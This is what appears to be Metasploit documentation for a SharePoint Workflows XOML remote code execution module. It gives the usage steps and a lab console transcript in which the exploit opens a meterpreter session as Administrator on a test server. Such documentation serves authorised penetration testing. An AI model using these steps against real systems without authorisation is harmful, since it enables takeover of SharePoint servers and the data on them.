## Vulnerable Application

This module exploits a vulnerability within SharePoint and its .NET backend
that allows an attacker to execute commands using specially crafted XOML data
sent to SharePoint via the Workflows functionality.

## Verification Steps

  1. Install the application
  1. Start msfconsole
  1. Do: `use exploit/windows/http/sharepoint_workflows_xoml`
  1. Set the target options (`RHOSTS`, `RPORT` and `SSL`) as appropriate
  1. Set the authentication options (`DOMAIN`, `USERNAME` and `PASSWORD`) as appropriate
  1. Do: `run`
  1. You should get a shell

## Scenarios

### SharePoint 2019 on Server 2016

```
msf5 exploit(windows/http/sharepoint_workflows_xoml) > show options 

Module options (exploit/windows/http/sharepoint_workflows_xoml):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN     WORKGROUP        yes       The domain to use for Windows authentication
   PASSWORD   Password1        yes       The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.14   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to the SharePoint application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   administrator    yes       Username to authenticate as
   VHOST                       no        HTTP server virtual host


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.159.14   no        The target address


Exploit target:

   Id  Name
   --  ----
   2   Windows Powershell


msf5 exploit(windows/http/sharepoint_workflows_xoml) > exploit

[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Started bind TCP handler against 192.168.159.14:4444
[*] Sending stage (206403 bytes) to 192.168.159.14
[*] Meterpreter session 3 opened (0.0.0.0:0 -> 192.168.159.14:4444) at 2020-03-23 18:11:44 -0400

meterpreter > sysinfo
Computer        : SHRPNT2019-P
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : SHRPNT2019P
Logged On Users : 14
Meterpreter     : x64/windows
meterpreter > getuid
Server username: SHRPNT2019P\Administrator
meterpreter >
```